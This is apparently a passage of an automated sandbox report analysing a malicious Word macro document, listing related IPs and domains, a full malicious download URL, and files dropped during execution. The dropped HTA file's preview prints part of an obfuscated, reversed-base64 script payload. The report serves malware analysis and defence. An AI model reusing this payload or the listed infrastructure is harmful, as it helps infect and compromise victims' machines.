                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                21:19:20API Interceptor28x Sleep call for process: explorer.exe modified
                21:19:22API Interceptor56x Sleep call for process: mshta.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                194.62.42.144particulars 11.010.2021.docGet hashmaliciousBrowse
                • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
                particulars 11.010.2021.docGet hashmaliciousBrowse
                • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
                jk2BhrWvzs.docmGet hashmaliciousBrowse
                • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS
                jk2BhrWvzs.docmGet hashmaliciousBrowse
                • shoulderelliottd.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                shoulderelliottd.cominstruct_11.21.doc.docmGet hashmaliciousBrowse
                • 194.62.42.144
                particulars 11.010.2021.docGet hashmaliciousBrowse
                • 194.62.42.144
                particulars 11.010.2021.docGet hashmaliciousBrowse
                • 194.62.42.144
                jk2BhrWvzs.docmGet hashmaliciousBrowse
                • 194.62.42.144
                jk2BhrWvzs.docmGet hashmaliciousBrowse
                • 194.62.42.144

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                ZEISS-ASRUinstruct_11.21.doc.docmGet hashmaliciousBrowse
                • 194.62.42.144
                instruct_11.21.doc.docmGet hashmaliciousBrowse
                • 194.62.42.144
                particulars 11.010.2021.docGet hashmaliciousBrowse
                • 194.62.42.144
                particulars 11.010.2021.docGet hashmaliciousBrowse
                • 194.62.42.144
                inquiry-11.21.docGet hashmaliciousBrowse
                • 194.62.42.45
                inquiry-11.21.docGet hashmaliciousBrowse
                • 194.62.42.45
                inquiry-11.21.docGet hashmaliciousBrowse
                • 194.62.42.45
                bE5TVG6QkV.docmGet hashmaliciousBrowse
                • 194.62.42.31
                bE5TVG6QkV.docmGet hashmaliciousBrowse
                • 194.62.42.31
                pZt5P80bs1.docmGet hashmaliciousBrowse
                • 194.62.42.143
                pZt5P80bs1.docmGet hashmaliciousBrowse
                • 194.62.42.143
                jk2BhrWvzs.docmGet hashmaliciousBrowse
                • 194.62.42.144
                jk2BhrWvzs.docmGet hashmaliciousBrowse
                • 194.62.42.144
                e6vHWtg9cC.docmGet hashmaliciousBrowse
                • 194.62.42.42
                e6vHWtg9cC.docmGet hashmaliciousBrowse
                • 194.62.42.42
                4htQNyKQ9P.docmGet hashmaliciousBrowse
                • 194.62.42.116
                oNmDvNFrqi.docmGet hashmaliciousBrowse
                • 194.62.42.116
                4htQNyKQ9P.docmGet hashmaliciousBrowse
                • 194.62.42.116
                oNmDvNFrqi.docmGet hashmaliciousBrowse
                • 194.62.42.116
                oNmDvNFrqi.docmGet hashmaliciousBrowse
                • 194.62.42.116

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\warning[1]
                Process:C:\Windows\SysWOW64\mshta.exe
                File Type:GIF image data, version 89a, 36 x 38
                Category:downloaded
                Size (bytes):1062
                Entropy (8bit):4.517838839626174
                Encrypted:false
                SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                MD5:124A9E7B6976F7570134B7034EE28D2B
                SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:res://ieframe.dll/warning.gif
                Preview: GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\error[1]
                Process:C:\Windows\SysWOW64\mshta.exe
                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                Category:downloaded
                Size (bytes):1706
                Entropy (8bit):5.274543201400288
                Encrypted:false
                SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                MD5:B9BEC45642FF7A2588DC6CB4131EA833
                SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:res://ieframe.dll/error.js
                Preview: ...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[1]
                Process:C:\Windows\SysWOW64\mshta.exe
                File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                Category:downloaded
                Size (bytes):3247
                Entropy (8bit):5.459946526910292
                Encrypted:false
                SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:res://ieframe.dll/error.dlg
                Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B185F38B.gif
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:GIF image data, version 89a, 774 x 198
                Category:dropped
                Size (bytes):14327
                Entropy (8bit):7.959467120915826
                Encrypted:false
                SSDEEP:384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv
                MD5:76DA3E2154587DD3D69A81FCDB0C7364
                SHA1:0F23E27B3A456B22A11D3FBC3132397B0DDC9357
                SHA-256:F9299AB3483A8F729B2ACA2111B46E9952D4491AC66124FEC22C1C789EBC3139
                SHA-512:A20BA525941043701E8DA5234A286FF2AF0A5F4C45998F1BA3BD59785FF4CDDAA72DE316D0BC651C68F30A6587741539B51D356BF5D6FEEAFCAE492AB277BB45
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: GIF89a.............A..)P..?...........4.............P..K.Uo.f}.v..............=..J..G..M..J..H..F..=..O..L..K..@..<..;..9..5z.R..N..M..M..3v.2s.P..1r.1q.W..F..I..J. K.&Q.Ch.A`.d............C..R.."L.T..A...h..g.*^.%T.O..P..8..4v..@.U..T..S..Q..F..>..S..P..@..2m.[..Y..X..V..R..B..U..T..W..O..T..O.*g.|...............I..M..Q..W...1.W.._..W..]..]..\..[..Z..W..V..C..5p.b..]..[..X..W..Y..Q..O..^..[..Z../a.]..\..Z..^..X.._.._..I..`..]..a..`.!c.!^.%e.$b.&f.)h.5q.>v.H~.Y..h..v.............................N..R..U..X..Z..b..`..\..`..a..b..c..d..O. d. d..R.!f."g."e.!f.#g.,m............._."k..P..9g%m........As*z.)x.,~.+|.+{.&n. \..Gy*v.6..K....../...Bm.........6....;..9..8..A..:..:..3..+l.B..C..F..N..R..T..\..i..@..@..=..A..@..D..=..7.."Uy<..%].K..N.......................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{54E91E67-388A-4A0C-84FA-B0F79F296DD3}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):29696
                Entropy (8bit):3.76975546525641
                Encrypted:false
                SSDEEP:384:/UtzuhEb67dfN0j3i89tE6hEb6+dfN0j3i8:S+Eb67facCEb6+fa
                MD5:323E9246AFCBA8C21E774047CC81C04F
                SHA1:8FAF9515396E488653F701D1772C385C031F0D2D
                SHA-256:2D583EDB0A65E385529729AE3A9F8B53F0341C69E6303AEC354DCB7DD5C91D60
                SHA-512:0D269334C6A456E477F5C72A85648E941D135586DA9D6AB231F5ADABD4A57FB754F3541925CB83F10FA11138565317F33E037C90966181321BB76B13F2A5BB6E
                Malicious:false
                Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................)....................................... ...(...!..."...#...$...%...&...'...*...7.......+...,...-......./...0...1...2...3...4...5...6.......8...........................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{243B81DF-B272-4B3E-92C5-997100EFB3D7}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{801FE4EE-0936-4464-ADE9-FBC9646826E4}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):21166
                Entropy (8bit):2.690771718216997
                Encrypted:false
                SSDEEP:384:IcAAooAAsM3V+oTpArJltBu+UaGmXfKfUiwvXv7vUo6s1w6:IcAAooAAsM3V+oTpArJltBu+UaGmXfKS
                MD5:DEDC6320F5E8B7E7877C43BB5618EA55
                SHA1:2143954452A74AA00B077664B82544E1DAA51AC2
                SHA-256:37EDEA11F289D8863015712C82ADF36A17584793B49D6222F70D4BD0B9DF8A8C
                SHA-512:030B6F931B4424DB621348E4089F5F69D50BA13B34772E611ADA4A20B5DF67582EB4959C5FD5B45BAFDA90E8965BEE5AAA3926ACB89A22C6403CC502A83B45D3
                Malicious:false
                Preview: ../.<.$.1.h.$.1.t.$.1.m.$.1.l.$.1.>.$.1.<.$.1.b.$.1.o.$.1.d.$.1.y.$.1.>.$.1.<.$.1.d.$.1.i.$.1.v.$.1. .$.1.i.$.1.d.$.1.=.$.1.'.$.1.y.$.1.o.$.1.u.$.1.G.$.1.i.$.1.r.$.1.l.$.1.Y.$.1.o.$.1.u.$.1.'.$.1. .$.1.s.$.1.t.$.1.y.$.1.l.$.1.e.$.1.=.$.1.'.$.1.f.$.1.o.$.1.n.$.1.t.$.1.-.$.1.c.$.1.o.$.1.l.$.1.o.$.1.r.$.1.:.$.1. .$.1.#.$.1.0.$.1.0.$.1.0.$.1.'.$.1.>.$.1.l.$.1.a.$.1.v.$.1.e.$.1.<.$.1./.$.1.d.$.1.i.$.1.v.$.1.>.$.1.<.$.1.d.$.1.i.$.1.v.$.1. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Jul 14 02:20:08 2009, mtime=Sat Nov 13 04:19:19 2021, atime=Sat Nov 13 04:19:19 2021, length=4096, window=hide
                Category:dropped
                Size (bytes):802
                Entropy (8bit):4.420291052447701
                Encrypted:false
                SSDEEP:12:8cJ0hgXg/XAlCPCHemkWYCACmWicvbKXplgbNv/Z3YilMMEpxRljK/bTd+8/Td+l:8cJc/XRlenvB3qY/R7m
                MD5:F2942107F46F0AC879802626FD3CF96C
                SHA1:A3131CA267F9CE36063D36F7CE19A5E6D6446931
                SHA-256:FFB5DDDF55F64BC01442B745B4EC622449E65E58F1BD451D7D4D6A71E89C817B
                SHA-512:882E5E6889D9D9EA36F161A6ED8FC5C3569ECB36D8E0A1075459336FFA2CE8E4184D81F078D7881D5B973C1D62051FFC4B4D05DF6C2CA1DF0DA9F9FDBFBF5ED0
                Malicious:false
                Preview: L..................F............1....L..N....L..N................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....x.1......>.C..Public..b.......:...>.C*...b...............8.....P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.......b...............-...8...[............?J......C:\Users\..#...................\\301389\Users.Public.......\.....\.....\.....\.....\.....\.P.u.b.l.i.c..........................v..*.cM.jVD.Es.................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......301389..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):138
                Entropy (8bit):4.79454253036153
                Encrypted:false
                SSDEEP:3:bDuMJlULQwXULXLpzCtYrSN7lAdRLUlmxWHixwXULXLpzCN7lAdRLUlv:bCjxXUZzUYrkOTAZNXUZz0OTA1
                MD5:82F13A5A135511405BAA26408509C708
                SHA1:6ACBF5652F9A7735E8EF40DFA3B2511AB8CADD99
                SHA-256:FE50645E8F45D4FDA888CA2CED1DFC0177DF03AE6F4AF64904B38FF61BE5FCAC
                SHA-512:C186BC9A116CE0D834F6B9A2BB2AFF2712A3D0D6367C7DE423A6A43FF7C404D640D873828E89B19EF7E65F3559FAE4116BA6C52DFCA77F9C24950CB436B2B9BD
                Malicious:false
                Preview: [folders]..Templates.LNK=0..instruct_11.21.doc.LNK=0..Public.LNK=0..powPowNext.LNK=0..[misc]..instruct_11.21.doc.LNK=0..powPowNext.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\instruct_11.21.doc.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Sat Nov 13 04:19:15 2021, length=34817, window=hide
                Category:dropped
                Size (bytes):1059
                Entropy (8bit):4.499979446869528
                Encrypted:false
                SSDEEP:12:8LjgXg/XAlCPCHaXeBhB/OW9qX+WkNQRUREjuicvbKkALNoDtZ3YilMMEpxRljKc:8h/XTuzLIqNoNe7ACDv3qY/Qd7Qy
                MD5:C871D7E92C9CF7FA6C9CBA6677348C54
                SHA1:431F808CEAFF80A5DD981D7BE212A3399CE46B7D
                SHA-256:F6DF5B82021060D1D7BFCE30171B88FE24CFEF1B3A59F7715310EDAAC69C3BF1
                SHA-512:8AFF5C75502C906B8284037ABCC5D14535D87AE4A0E2DB202AC919458E668153C644209581F18730FA1EB83FB6D8D700A15B68D4E1FB8EC8A5BB89D0585C2B0D
                Malicious:false
                Preview: L..................F.... ...gu.?...gu.?....G..N................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.....mSh* .INSTRU~1.DOC..\.......S...S..*.........................i.n.s.t.r.u.c.t._.1.1...2.1...d.o.c...d.o.c.m.......................-...8...[............?J......C:\Users\..#...................\\301389\Users.user\Desktop\instruct_11.21.doc.docm.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.n.s.t.r.u.c.t._.1.1...2.1...d.o.c...d.o.c.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......301389..........D_....3N.
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\powPowNext.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 13 04:19:19 2021, mtime=Sat Nov 13 04:19:19 2021, atime=Sat Nov 13 04:19:19 2021, length=3346, window=hide
                Category:modified
                Size (bytes):949
                Entropy (8bit):4.519048962779398
                Encrypted:false
                SSDEEP:12:8VULDgXg/XAlCPCHeQjD7YCACmC8bcnsfDdusaUCicvbKZ9UflAsnlgbNv/Z3Yi4:8VUB/XhCzUD8N2e4UqOWvB3qY/87l
                MD5:1C058852EC0794DE5D513871B5E22A82
                SHA1:D52C52370A82FE6680663E1328D6291C5568EDD2
                SHA-256:90EF71EF566B1DC32FD57272EBE33AD6D5B03185F70FA03665D159E904D4BDBC
                SHA-512:DCFA76B8749CEF47B750571B546FAA8D2BD9D86F460B060BA7C1A24C5BAB7113ABEDAB550F7909D05AE279033C60E8520AC8A6D11B6E19BEEDBB5DBBC47190F2
                Malicious:false
                Preview: L..................F.... ....L..N....L..N...&..N................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....x.1.....mSj*..Public..b.......:..mSj**...b...............8.....P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....f.2.....mSj* .POWPOW~1.HTA..J......mSj*mSj**.........................p.o.w.P.o.w.N.e.x.t...h.t.a.......q...............-...8...[............?J......C:\Users\..#...................\\301389\Users.Public\powPowNext.hta.'.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.p.o.w.P.o.w.N.e.x.t...h.t.a..........................v..*.cM.jVD.Es.................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......301389..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyDFH5UKycWT5yAi/lln:vdsCkWtgZ2YAyll
                MD5:6525B5171CE36A6D7EDB3E4DFD5CB579
                SHA1:70AFC3864539BCF8F1C4CD336F6096534A6268FA
                SHA-256:617E1415F4483DAE29072F8E5A042E9EB3446F53F9AC2F26180AECD1D93151CF
                SHA-512:700AEAE11F026EDE01A59B5CC1166D041E1B100E91F84F984D072CDB154251AD15A11C629B8CD7314CB0B2FF8669C3C52EB592020FBA2502CB35BDE6D1EA8322
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\user\Desktop\~$struct_11.21.doc.docm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyDFH5UKycWT5yAi/lln:vdsCkWtgZ2YAyll
                MD5:6525B5171CE36A6D7EDB3E4DFD5CB579
                SHA1:70AFC3864539BCF8F1C4CD336F6096534A6268FA
                SHA-256:617E1415F4483DAE29072F8E5A042E9EB3446F53F9AC2F26180AECD1D93151CF
                SHA-512:700AEAE11F026EDE01A59B5CC1166D041E1B100E91F84F984D072CDB154251AD15A11C629B8CD7314CB0B2FF8669C3C52EB592020FBA2502CB35BDE6D1EA8322
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\Public\~$wPowNext.hta
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyDFH5UKycWT5yAi/lln:vdsCkWtgZ2YAyll
                MD5:6525B5171CE36A6D7EDB3E4DFD5CB579
                SHA1:70AFC3864539BCF8F1C4CD336F6096534A6268FA
                SHA-256:617E1415F4483DAE29072F8E5A042E9EB3446F53F9AC2F26180AECD1D93151CF
                SHA-512:700AEAE11F026EDE01A59B5CC1166D041E1B100E91F84F984D072CDB154251AD15A11C629B8CD7314CB0B2FF8669C3C52EB592020FBA2502CB35BDE6D1EA8322
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                C:\Users\Public\~WRD0000.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):3346
                Entropy (8bit):5.726896594481782
                Encrypted:false
                SSDEEP:96:bGotzrVgMR61CQB7MGxag4hE8h9LU9fLtrlv:yCrVnuPMGByEkmp
                MD5:FA2B89027304712FB8366C1F6B4F2827
                SHA1:6F851332C08998D25D839112A5C9D3CA8E57FCC0
                SHA-256:6E1338E07405A9B14DB254B9769767EA824CF3AC1C8DFECB3513E95135ECEAEE
                SHA-512:8C1705A8165C062D9413F6FC00A697F6E62D038A04D5A347D036B73A97A64FE1831038C8007A1F29F80A2F765C5428463CEAE9EAF53FAED558752F24A32744CD
                Malicious:false
                Preview: <html><body><div id='youGirlYou' style='font-color: #000'>lave</div><div id='karolLikeDow' style='font-color: #000'>2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic1
                C:\users\public\powPowNext.hta (copy)
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):3346
                Entropy (8bit):5.726896594481782
                Encrypted:false
                SSDEEP:96:bGotzrVgMR61CQB7MGxag4hE8h9LU9fLtrlv:yCrVnuPMGByEkmp
                MD5:FA2B89027304712FB8366C1F6B4F2827
                SHA1:6F851332C08998D25D839112A5C9D3CA8E57FCC0
                SHA-256:6E1338E07405A9B14DB254B9769767EA824CF3AC1C8DFECB3513E95135ECEAEE
                SHA-512:8C1705A8165C062D9413F6FC00A697F6E62D038A04D5A347D036B73A97A64FE1831038C8007A1F29F80A2F765C5428463CEAE9EAF53FAED558752F24A32744CD
                Malicious:false
